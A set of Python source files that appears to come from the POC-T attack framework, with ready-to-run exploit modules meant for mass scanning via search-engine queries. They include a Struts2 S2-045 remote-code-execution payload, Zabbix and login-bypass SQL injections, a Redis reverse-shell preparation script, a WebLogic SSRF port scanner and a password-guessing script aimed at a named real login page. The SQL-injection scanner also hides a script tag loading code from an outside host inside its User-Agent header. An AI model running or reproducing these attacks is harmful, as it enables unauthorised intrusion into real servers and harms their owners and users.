#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = 24''

"""
Struts2 S2-045 Remote Code Execution PoC (CVE-2017-5638)

Version:
2.3.5-2.3.31, 2.5-2.5.10

Usage:
python POC-T.py -s struts2-s2045 -aG "inurl:login.action" --gproxy "http 127.0.0.1 1080"
python POC-T.py -s struts2-s2045 -aZ "login.action"
python POC-T.py -s struts2-s2045 -iF FILE.txt
"""

import requests
import random


def poc(url):
    if '://' not in url:
        url = 'http://' + url
    try:
        a = random.randint(10000000, 20000000)
        b = random.randint(10000000, 20000000)
        c = a + b
        win = 'set /a ' + str(a) + ' + ' + str(b)
        linux = 'expr ' + str(a) + ' + ' + str(b)

        header = dict()
        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + win + "'):(#cmd='" + linux + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        r = requests.get(url, headers=header, timeout=5)
        if str(c) in r.text:
            return '[S2-045]'+url
        else:
            return False
    except Exception:
        return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

import locale
import os
import re
import sys
from subprocess import PIPE
from subprocess import Popen as execute
from lib.core.common import getSafeExString
from lib.core.common import pollProcess
from lib.core.data import logger
from lib.core.data import paths
from lib.core.settings import GIT_REPOSITORY
from lib.core.settings import IS_WIN
from lib.core.revision import getRevisionNumber


def update():
    success = False
    if not os.path.exists(os.path.join(paths.ROOT_PATH, ".git")):
        errMsg = "not a git repository. Please checkout the 'Xyntax/POC-T' repository "
        errMsg += "from GitHub (e.g. 'git clone https://github.com/Xyntax/POC-T.git POC-T')"
        logger.error(errMsg)
    else:
        infoMsg = "updating POC-T to the latest development version from the "
        infoMsg += "GitHub repository"
        logger.info(infoMsg)

        debugMsg = "POC-T will try to update itself using 'git' command"
        logger.info(debugMsg)

        logger.info("update in progress ")

        try:
            process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE,
                              stderr=PIPE, cwd=paths.ROOT_PATH.encode(
                    locale.getpreferredencoding()))  # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
            pollProcess(process, True)
            stdout, stderr = process.communicate()
            success = not process.returncode
        except (IOError, OSError), ex:
            success = False
            stderr = getSafeExString(ex)

        if success:
            _ = getRevisionNumber()
            logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _))
        else:
            if "Not a git repository" in stderr:
                errMsg = "not a valid git repository. Please checkout the 'Xyntax/POC-T' repository "
                errMsg += "from GitHub (e.g. 'git clone https://github.com/Xyntax/POC-T.git POC-T')"
                logger.error(errMsg)
            else:
                logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())

    if not success:
        if IS_WIN:
            infoMsg = "for Windows platform it's recommended "
            infoMsg += "to use a GitHub for Windows client for updating "
            infoMsg += "purposes (http://windows.github.com/) or just "
            infoMsg += "download the latest snapshot from "
            infoMsg += "https://github.com/Xyntax/POC-T/archive/master.zip"
        else:
            infoMsg = "for Linux platform it's required "
            infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"

        logger.info(infoMsg)

    sys.exit(0)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
Use as 'from lib.utils import versioncheck'
It has to be the first non-standard import before your project enter main() function
"""

import sys

PYVERSION = sys.version.split()[0]

if PYVERSION >= "3" or PYVERSION < "2.7":
    exit("[CRITICAL] incompatible Python version detected ('%s'). "
         "For successfully running this project, you'll have to use version 2.7"
         "(visit 'http://www.python.org/download/')" % PYVERSION)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

import urlparse


def get_domain(url):
    """
    added by cdxy May 8 Sun,2016

    Use:
    get_domain('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#')

    Return:
    'http://cdxy.me:80'
    """
    p = urlparse.urlparse(url)
    return urlparse.urlunsplit([p.scheme, p.netloc, '', '', ''])


def iterate_path(ori_str):
    """
    added by cdxy May 8 Sun,2016

    Use:
    iterate_path_to_list('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#')

    Return:
    ['http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#',
     'http://cdxy.me:80/'
     'http://cdxy.me:80/cdsa',
     'http://cdxy.me:80/cdsa/cda',
     'http://cdxy.me:80/cdsa/cda/aaa.jsp']

    """
    parser = urlparse.urlparse(ori_str)
    _path_list = parser.path.replace('//', '/').strip('/').split('/')
    _ans_list = set()
    _ans_list.add(ori_str)

    if not _path_list[0]:
        return _ans_list

    _ans_list.add(get_domain(ori_str))
    s = ''
    for each in _path_list:
        s += '/' + each
        _ans_list.add(urlparse.urljoin(ori_str, s))
    return _ans_list


if __name__ == '__main__':
    url = 'http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#'
    print urlparse.urlparse(url)
    print get_domain(url)
    for each in iterate_path(url):
        print each



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
DNS Zone Transfer PoC

只能运行在linux环境下
系统需具备两个命令:nslookup,dig(kali里面已有)

输入格式: 不带协议名，不带目录名
[ok]    cdxy.me
[ok]    www.cdxy.me
[ok]    app.air.cdxy.me
[wrong] http://cdxy.me
[wrong] cdxy.me/index.html

会产生以下两种报错(可忽略):
list index out of range
couldn't get address for 'xxx.xxx.xxx.': not found

"""

import os
import re
import subprocess
import time
import sys


def poc(domain):
    try:
        if subprocess.mswindows:
            print '[Error] This script only for linux/unix, please quit with [Ctrl-C]'
            time.sleep(10000)
            return False
        if '-C' in sys.argv:
            print '[Error] This script only for muti-threading mode, please quit with [Ctrl-C] and use [-eT] in your command.'
            time.sleep(10000)
            return False
        domain = domain.split('.')[-2].strip(' ') + '.' + domain.split('.')[-1].strip(' ')
        cmd_res = os.popen('nslookup -type=ns ' + domain).read()  # fetch DNS Server List
        dns_servers = re.findall('nameserver = (.*?)\n', cmd_res)
        for server in dns_servers:
            cmd_res = os.popen('dig @%s axfr %s' % (server, domain)).read()
            if cmd_res.find('Transfer failed.') < 0 and \
                            cmd_res.find('connection timed out') < 0 and \
                            cmd_res.find('XFR size') > 0:
                return True
        return False
    except Exception, e:
        return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
ZABBIX jsrpc.php 参数profileIdx2 insert SQL注入漏洞

zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞， 在开启guest的情况下，攻击者无需授权登陆即可登陆zabbix管理系统， 也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。

Usage:
  python POC-T.py -s zabbix-jsrpc-sqli -aZ "zabbix country:us"
  
Version
  v2.2.x, 3.0.0-3.0.3

"""

import requests
from plugin.urlparser import iterate_path


def poc(url):
    if '://' not in url:
        url = 'http://' + url
    payload = "/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
    for each in iterate_path(url):
        if '?' in each:
            continue
        target_url = url.rstrip('/') + payload
        try:
            r = requests.get(target_url, timeout=10)
            if 'ed733b8d10be225eceba344d533586' in r.content:
                return '[mysql]'+ each
            if 'Error in query [' in r.content or 'SQL error [' in r.content:
                return each
        except Exception, e:
            pass
    return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me


"""
CloudEye API

Usage:
    c = CloudEye()
    a = c.getRandomDomain('cdxy')
    try:
        requests.get('http://' + a, timeout=1)
    except Exception:
        pass
    print c.verifyDNS(delay=0)
    print c.verifyHTTP(delay=0)
    print c.getDnsRecord(delay=0)
    print c.getHttpRecord(delay=0)
"""

import random
import requests
import time
from string import ascii_lowercase
from lib.utils.config import ConfigFileParser

# load once for all thread
key = ConfigFileParser().CloudEyeApikey()
uniq_domain = ConfigFileParser().ColudEyePersonaldomain().split('.')[0]


class CloudEye:
    def __init__(self):
        self.unique = uniq_domain
        self.random = ''.join([random.choice(ascii_lowercase) for _ in range(10)])

    def getRandomDomain(self, custom='poc'):
        """
        full domain = [random].[custom].[unique].dnslog.info
        e.g. fezarvgo.poc.ee8a6f.dnslog.info
        """
        self.custom = custom
        return '%s.%s.%s.dnslog.info' % (self.random, self.custom, self.unique)

    def getDnsRecord(self, delay=2):
        time.sleep(delay)
        query = self.random + '.' + self.custom
        api_base = 'http://cloudeye.me/api/{key}/{domain}/DNSLog/'.format(key=key, domain=query)
        return requests.post(api_base).content

    def getHttpRecord(self, delay=2):
        time.sleep(delay)
        query = self.random + '.' + self.custom
        api_base = 'http://cloudeye.me/api/{key}/{domain}/ApacheLog/'.format(key=key, domain=query)
        return requests.post(api_base).content

    def verifyDNS(self, delay=2):
        return 'dnslog.info' in self.getDnsRecord(delay)

    def verifyHTTP(self, delay=2):
        return 'dnslog.info' in self.getHttpRecord(delay)


def queryDnsRecord(domain, delay=2):
    time.sleep(delay)
    domain = domain.replace(uniq_domain + '.dnslog.info', '').rstrip('.')
    api_base = 'http://cloudeye.me/api/{key}/{domain}/DNSLog/'.format(key=key, domain=domain)
    return requests.post(api_base).content


def queryHttpRecord(domain, delay=2):
    time.sleep(delay)
    domain = domain.replace(uniq_domain + '.dnslog.info', '').rstrip('.')
    api_base = 'http://cloudeye.me/api/{key}/{domain}/ApacheLog/'.format(key=key, domain=domain)
    return requests.post(api_base).content



#!/usr/bin/env python		
#coding:utf-8

import sys
sys.path.append('../')
from plugin.util import *

def test_util():
	print host2IP("http://127.0.0.1:6379/12")
	print IP2domain("127.0.0.1")
	print checkPortTcp("123.206.65.167", 81)

def test_cloudeye():
	pass

if __name__ == '__main__':
	test_util()


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
爆破脚本示例

POST方式提交表单
用户名 => list1
密码   => 外部传入

"""

import requests

list1 = [
    'admin',
    'zhangwei',
    'wangf',
    'wangjing',
    'lixy',
    'wangl',
    'liq',
    'wangm',
    'liuy',
    'zhangjie',
    'wangq',
    'zhangtao',
    'zhangt',
    'liuj',
    'wangh',
    'chenj',
    'lid',
    'lih',
    'zhangp',
    'zhangyl',
    'yangy',
    'liugy',
    'zhanghong',
    'wangym',
    'wanglin',
    'liux',
    'chenc',
    'gaof',
    'lijg',
    'yangw',
    'wuxy',
    'wanggf',
    'chenjh'
]


def poc(i):
    try:
        for each in list1:
            url = 'http://beijing.51idc.com/login'

            d = {
                'LoginId': str(each),
                'LoginPasswd': str(i)
            }

            s = requests.session()
            s.get(url=url)
            r = s.post(url=url, data=d)
            if not len(r.content) == 1809:
                return True
        return False
    except Exception, e:
        return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
测试用例
"""

import random
import time


def poc(str):
    time.sleep(3)
    if random.randint(1, 10) > 5:
        return True
    return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

import Queue
import sys
import imp
import os
from lib.core.data import th, conf, logger, paths
from lib.core.enums import API_MODE_NAME, TARGET_MODE_STATUS
from lib.core.settings import ESSENTIAL_MODULE_METHODS
from lib.core.exception import ToolkitValueException
from lib.controller.api import runApi
from thirdparty.IPy import IPy


def loadModule(script_name, batch):
    conf.MODULE_PLUGIN = dict()
    index = 0
    for _name in conf.MODULE_USE:
        msg = 'Load custom script: %s' % _name
        logger.success(msg)
        
        #获取真实脚本路径 add batch by jiangsir404
        # step1. -s参数存在, 首先从当前目录查找，如果不存在则在script目录下查找
        # step2. -b参数存在, 首先从当前目录查找，如果不存在则在script目录下查找
        if script_name:
            script_path = os.path.dirname(os.path.abspath(script_name))
            if not os.path.exists(script_path + '/' + _name):
                dirname = os.path.split(script_name)
                script_path = paths.SCRIPT_PATH + '/' + dirname[0]
        if batch:
            script_path = os.getcwd() + '/' + batch
            if not os.path.exists(script_path):
                script_path = paths.SCRIPT_PATH + '/' + batch

        logger.success("Load script path: %s" % script_path)
        fp, pathname, description = imp.find_module(os.path.splitext(_name)[0], [script_path])
        try:
            index = index + 1
            module_obj = imp.load_module('_' + str(index), fp, pathname, description)
            # ESSENTIAL_MODULE_METHODS值为poc
            for each in ESSENTIAL_MODULE_METHODS:
                if not hasattr(module_obj, each):
                    errorMsg = "Can't find essential method:'%s()' in current script，Please modify your script/PoC."
                    sys.exit(logger.error(errorMsg))
            conf.MODULE_PLUGIN[_name] = module_obj
        except ImportError, e:
            errorMsg = "Your current scipt [%s.py] caused this exception\n%s\n%s" \
                    % (_name, '[Error Msg]: ' + str(e), 'Maybe you can download this module from pip or easy_install')
            sys.exit(logger.error(errorMsg))


def loadPayloads():
    infoMsg = 'Initialize targets...'
    logger.success(infoMsg)
    th.queue = Queue.Queue()
    if conf.TARGET_MODE is TARGET_MODE_STATUS.RANGE:
        int_mode()
    elif conf.TARGET_MODE is TARGET_MODE_STATUS.FILE:
        file_mode()
    elif conf.TARGET_MODE is TARGET_MODE_STATUS.IPMASK:
        net_mode()
    elif conf.TARGET_MODE is TARGET_MODE_STATUS.SINGLE:
        single_target_mode()
    elif conf.TARGET_MODE is TARGET_MODE_STATUS.API:
        api_mode()

    else:
        raise ToolkitValueException('conf.TARGET_MODE value ERROR.')
    logger.success('Total: %s' % str(th.queue.qsize()))


def file_mode():
    """iF模式，将target和poc两次循环遍历放入队列中"""
    for line in open(conf.INPUT_FILE_PATH):
        for name,exp in conf.MODULE_PLUGIN.items():
            sub = line.strip()
            if sub:
                module = dict()
                module["sub"] = sub
                module["name"] = name
                module["poc"] = exp
                th.queue.put(module)


def int_mode():
    _int = conf.I_NUM2.strip().split('-')
    for each in range(int(_int[0].strip()), int(_int[1].strip())):
        for name,exp in conf.MODULE_PLUGIN.items():
            module = dict()
            module["sub"] = str(each)
            module["poc"] = exp
            module["name"] = name
            th.queue.put(module)


def net_mode():
    ori_str = conf.NETWORK_STR
    try:
        _list = IPy.IP(ori_str, make_net=1)
    except Exception, e:
        sys.exit(logger.error('Invalid IP/MASK,%s' % e))
    for each in _list:
        for name,exp in conf.MODULE_PLUGIN.items():
            module = dict()
            module["sub"] = str(each)
            module["poc"] = exp
            module["name"] = name
            th.queue.put(module)


def single_target_mode():
    """遍历每个poc放入到队列中"""
    for name,exp in conf.MODULE_PLUGIN.items():
        module = dict()
        module["sub"] = str(conf.SINGLE_TARGET_STR)
        module["poc"] = exp
        module["name"] = name
        th.queue.put(module)


def api_mode():
    conf.API_OUTPUT = os.path.join(paths.DATA_PATH, conf.API_MODE)
    if not os.path.exists(conf.API_OUTPUT):
        os.mkdir(conf.API_OUTPUT)

    file = runApi()
    for line in open(file):
        for name,exp in conf.MODULE_PLUGIN.items():
            module = dict()
            module["sub"] = line.strip()
            module["name"] = name
            if module["sub"]:
                module["poc"] = exp
                th.queue.put(module)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
redis getshell expliot (/var/spool/cron reverse shell)

检查Redis未授权访问->检查是否存在web服务->检查exp必需的权限和功能->枚举绝对路径->输出结果供手工测试

"""

import redis
from plugin.util import host2IP
from plugin.util import randomString
from plugin.util import redirectURL
from plugin.util import checkPortTcp
from plugin.static import ABSPATH_PREFIXES, ABSPATH_SUFFIXES


def poc(url):
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # 判断web服务
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                real_url = ip + ':' + str(web_port)
            break  # TODO 这里简单化处理,只返回了一个端口的结果
    else:
        return False

    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if 'redis_version' not in r.info():  # 判断未授权访问
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # 判断可写
        r.config_set('dir', '/root/')  # 判断对/var/www的写入权限(目前先判断为root)
        r.config_set('dbfilename', 'dump.rdb')  # 判断操作权限
        r.delete(key)
        r.save()  # 判断可导出
    except Exception, e:
        return False

    # 枚举绝对路径
    path_list = []
    for each in ABSPATH_PREFIXES.LINUX:
        try:
            r.config_set('dir', each.rstrip('/'))
            path_list.append(each)
            for suffix in ABSPATH_SUFFIXES:
                try:
                    r.config_set('dir', suffix.rstrip('/'))
                    path_list.append(each.rstrip('/') + '/' + suffix)
                except Exception:
                    continue
        except Exception:
            continue

    if len(path_list):
        return real_url + ' ' + ' '.join(path_list)
    else:
        return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

import os
import re

from subprocess import PIPE
from subprocess import Popen as execute

def getRevisionNumber():
    """
    Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD"
    """

    retVal = None
    filePath = None
    _ = os.path.dirname(__file__)

    while True:
        filePath = os.path.join(_, ".git", "HEAD")
        if os.path.exists(filePath):
            break
        else:
            filePath = None
            if _ == os.path.dirname(_):
                break
            else:
                _ = os.path.dirname(_)

    while True:
        if filePath and os.path.isfile(filePath):
            with open(filePath, "r") as f:
                content = f.read()
                filePath = None
                if content.startswith("ref: "):
                    filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip()
                else:
                    match = re.match(r"(?i)[0-9a-f]{32}", content)
                    retVal = match.group(0) if match else None
                    break
        else:
            break

    if not retVal:
        process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE)
        stdout, _ = process.communicate()
        match = re.search(r"(?i)[0-9a-f]{32}", stdout or "")
        retVal = match.group(0) if match else None

    return retVal[:7] if retVal else None



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
SAM Softech Admin Page Bypass

Usage
  python POC-T.py -s samsoftech-admin-bypass -aG "intext:Developed By : SAM Softech"
  python POC-T.py -s samsoftech-admin-bypass -aG "Developed By : SAM Softech"

Payload
  Username: ' or '1'='1' -- ' ~ ' or '1'='1'
  Password: ' or '1'='1' -- ' ~ ' or '1'='1'

"""

import requests
from plugin.urlparser import iterate_path


def poc(url):
    if '://' not in url:
        url = 'http://' + url
    payload = "' or '1'='1' -- ' ~ ' or '1'='1'"
    data = {'userid': payload, 'userpass': payload, 'submit': 'Enter'}
    for each in iterate_path(url):
        if '?' in each:
            continue
        target = each.rstrip('/') + '/myadmin/admin_validation.php'
        try:
            r = requests.post(target, data=data, timeout=15)
            if 'form name="frmNextstep"' in r.content:
                return target
        except Exception:
            pass
    return False



#!/usr/bin/env python		
#coding:utf-8

"""
测试fofa, zoomeye, google, shodan四个接口的搜索可否可用
"""

import unittest
import sys
import os

from pocs.lib.core.data import logger, paths
from pocs.lib.api.zoomeye.pack import ZoomEyeSearch
from pocs.lib.api.zoomeye.pack import ZoomEyeSearch
from pocs.lib.api.fofa.pack import FofaSearch

paths.COFIG_PATH = "../toolkit.conf"
# paths.CONFIG_PATH = os.path.dirname(os.path.dirname(__file__)) + "/toolkit.conf"
# print paths

class TestSearchApi(unittest.TestCase):
	def setUp(self):
		paths.CONFIG_PATH = os.path.dirname(os.path.dirname(__file__)) + "/toolkit.conf"
		print paths
		
	def tearDown(self):
		pass

	# def testShodan(self):
	# 	from lib.api.shodan.pack import ShodanSearch
	# 	res = ShodanSearch("ThinkPHP", 100)
	# 	print res

	def testZoomeye(self):
		res = ZoomEyeSearch("ThinkPHP", 10)
		print res, len(res)
		self.assertTrue(len(res) == 20 and isinstance(res, list))

	def testFofa(self):
		res = FofaSearch('domain="sangfor.com.cn"')
		print res

if __name__ == '__main__':
	suite = unittest.TestSuite()
	suite.addTest(TestSearchApi("testZoomeye"))
	#suite.addTest(TestSearchApi("testFofa"))
	unittest.TextTestRunner().run(suite)  



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me


import os
import subprocess

VERSION = '2.0.5'
PROJECT = "POC-T"
AUTHOR = 'cdxy'
MAIL = 'i@cdxy.me'
PLATFORM = os.name
LICENSE = 'GPLv2'
IS_WIN = subprocess.mswindows

# essential methods/functions in custom scripts/PoC (such as function poc())
ESSENTIAL_MODULE_METHODS = ['poc']
# Encoding used for Unicode data
UNICODE_ENCODING = "utf-8"
# String representation for NULL value
NULL = "NULL"
# Format used for representing invalid unicode characters
INVALID_UNICODE_CHAR_FORMAT = r"\x%02x"

ISSUES_PAGE = "https://github.com/Xyntax/POC-T/issues"
GIT_REPOSITORY = "git://github.com/Xyntax/POC-T.git"
GIT_PAGE = "https://github.com/Xyntax/POC-T"

BANNER = """\033[01;34m
                                             \033[01;31m__/\033[01;34m
    ____     ____     _____           ______\033[01;33m/ \033[01;31m__/\033[01;34m
   / __ \   / __ \   / ___/   ____   /__  __/\033[01;33m_/\033[01;34m
  / /_/ /  / /_/ /  / /___   /___/     / /
 / /___/   \____/   \____/            / /
/_/                                  /_/
    \033[01;37m{\033[01;m Version %s by %s mail:%s \033[01;37m}\033[0m
\n""" % (VERSION, AUTHOR, MAIL)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
Weblogic SSRF 内网扫描脚本(nmap的1000个端口)

Usage:
  python POC-T.py -s weblogic-ssrf -iN 10.10.0.0/24

返回结果示例:
10.10.0.10:22/80/111
10.10.0.13:22/111/1521/5801/5901/6001
10.10.0.14:22/111/1521/10000
10.10.0.51:21/22/111/843/5801
10.10.0.18:13/21/22/23/25/37/513/514/1521/5989/9090/32768/32783

"""

import requests
from plugin.static import NMAP_PORTS_1000 as ports

base_uri = 'https://xxx.xxx.com'

def poc(ip_str):
    ans = []
    flag = False
    for port in ports:
        exp_url = base_uri.rstrip('/') + "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search" % (
            ip_str, port)
        try:
            # 根据情况设置timeout
            c = requests.get(exp_url, timeout=3, verify=False).content
            if 'weblogic.uddi.client.structures.exception.XML_SoapException' in c:
                if 'No route to host' in c:
                    # 主机不存在
                    return False
                elif 'Received a response' in c:
                    ans.append(port)
                    flag = True
                elif 'Response contained no data' in c:
                    ans.append(port)
                    flag = True
                elif 'but could not connect' in c:
                    # 主机存在但端口未开放
                    flag = True
        except Exception:
            pass
    if flag:
        return ip_str + ':' + str('/'.join(ans))
    return False




#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = w8ay
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import urlparse
import hashlib
from urllib import quote as urlencode
from urllib import unquote as urldecode
import re
import requests
import os
from difflib import SequenceMatcher
import random

class dbms:
    DB2 = 'IBM DB2 database'
    MSSQL = 'Microsoft SQL database'
    ORACLE = 'Oracle database'
    SYBASE = 'Sybase database'
    POSTGRE = 'PostgreSQL database'
    MYSQL = 'MySQL database'
    JAVA = 'Java connector'
    ACCESS = 'Microsoft Access database'
    INFORMIX = 'Informix database'
    INTERBASE = 'Interbase database'
    DMLDATABASE = 'DML Language database'
    UNKNOWN = 'Unknown database'
def is_number(s):
    try:
        float(s)
        return True
    except ValueError:
        pass

    try:
        import unicodedata
        unicodedata.numeric(s)
        return True
    except (TypeError, ValueError):
        pass

    return False
def md5(src):
    m2 = hashlib.md5()
    m2.update(src)
    return m2.hexdigest()
def getFilteredPageContent(page, onlyText=True, split=" "):
    """
    Returns filtered page content without script, style and/or comments
    or all HTML tags

    >>> getFilteredPageContent(u'<html><title>foobar</title><body>test</body></html>')
    u'foobar test'
    """

    retVal = page

    # only if the page's charset has been successfully identified
    if isinstance(page, unicode):
        retVal = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), split, page)
        while retVal.find(2 * split) != -1:
            retVal = retVal.replace(2 * split, split)
        retVal = htmlunescape(retVal.strip().strip(split))

    return retVal
def getPageWordSet(page):
    """
    Returns word set used in page content

    >>> sorted(getPageWordSet(u'<html><title>foobar</title><body>test</body></html>'))
    [u'foobar', u'test']
    """

    retVal = set()

    # only if the page's charset has been successfully identified
    if isinstance(page, unicode):
        _ = getFilteredPageContent(page)
        retVal = set(re.findall(r"\w+", _))

    return retVal
def htmlunescape(value):
    """
    Returns (basic conversion) HTML unescaped value

    >>> htmlunescape('a&lt;b')
    'a<b'
    """

    retVal = value
    if value and isinstance(value, basestring):
        codes = (('&lt;', '<'), ('&gt;', '>'), ('&quot;', '"'), ('&nbsp;', ' '), ('&amp;', '&'))
        retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
        try:
            retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)
        except ValueError:
            pass
    return retVal
def randomDigits(length=8):
    """
    生成随机数字串

    :param length:生成字符串长度
    :return 数字串
    """
    digits = '0123456789'
    return ''.join([random.choice(digits) for _ in range(length)])
def GetRatio(firstPage, secondPage):
    """
    Prints words appearing in two different response pages
    """
    firstPage = getFilteredPageContent(firstPage)
    secondPage = getFilteredPageContent(secondPage)

    match = SequenceMatcher(None, firstPage, secondPage).ratio()
    return match
def Error_sqli(url,html):
    parse = urlparse.urlparse(url)
    if not parse.query:
        return False
    
    for path in parse.query.split('&'):
        if '=' not in path:
            continue
        k, v = path.split('=')
        quotes = '\''
        try:
            url_1 = url.replace("%s=%s"%(k,v),"%s=%s"%(k,urlencode(v + quotes)))
            header = dict()
            header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>"
            header["Referer"] = "http://www.qq.com"
            html2 = requests.get(url_1,headers=header).text
            for sql_regex, dbms_type in Get_sql_errors():
                match1 = sql_regex.search(html)
                match2 = sql_regex.search(html2)
                if  match2 and not match1 :
                    return "[SQL INJECT] [ERR_INFO Key:%s] %s"%(k,url)
        except Exception:
            pass
    return False
            
def INT_sqli(url,html):
    parse = urlparse.urlparse(url)
    if not parse.query:
        return False

    for i in parse.query.split('&'):
        if '=' not in i:
            continue
        k, v = i.split('=')
        if(is_number(v)):
            randDig = randomDigits(2)
            payload_0 = ["+1-1"," and %s=%s"%(randDig,randDig)]
            payload_1 = ["+1"," and %s=%s"%(randDig,str(int(randDig)+2))]
            for j in range(len(payload_0)):
                p0 = payload_0[j]
                p1 = payload_1[j]
                url_1 = url.replace("%s=%s"%(k,v),"%s=%s"%(k,v + urlencode(p0)))
                url_2 = url.replace("%s=%s"%(k,v),"%s=%s"%(k,v + urlencode(p1)))
                try:
                    header = dict()
                    header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>"
                    header["Referer"] = "http://www.qq.com"

                    html1 = requests.get(url_1, headers=header).text
                    html2 = requests.get(url_2, headers=header).text
                except Exception, e:
                    html1 = html2 = ''

                t1 = GetRatio(html,html1)
                f1 = GetRatio(html2,html1)
                # print html1,html2
                # print t1,f1
                if t1 > f1 > 0.65:
                    return "[SQL INJECT] [INT Inject Key:%s] %s"%(k,url)
    return False          

def Get_sql_errors():
    errors = []
    # ASP / MSSQL
    errors.append( ('System\.Data\.OleDb\.OleDbException', dbms.MSSQL ) )
    errors.append( ('\\[SQL Server\\]', dbms.MSSQL ) )
    errors.append( ('\\[Microsoft\\]\\[ODBC SQL Server Driver\\]', dbms.MSSQL ) )
    errors.append( ('\\[SQLServer JDBC Driver\\]', dbms.MSSQL ) )
    errors.append( ('\\[SqlException', dbms.MSSQL ) )
    errors.append( ('System.Data.SqlClient.SqlException', dbms.MSSQL ) )
    errors.append( ('Unclosed quotation mark after the character string', dbms.MSSQL ) )
    errors.append( ("'80040e14'", dbms.MSSQL ) )
    errors.append( ('mssql_query\\(\\)', dbms.MSSQL ) )
    errors.append( ('odbc_exec\\(\\)', dbms.MSSQL ) )
    errors.append( ('Microsoft OLE DB Provider for ODBC Drivers', dbms.MSSQL ))
    errors.append( ('Microsoft OLE DB Provider for SQL Server', dbms.MSSQL ))
    errors.append( ('Incorrect syntax near', dbms.MSSQL ) )
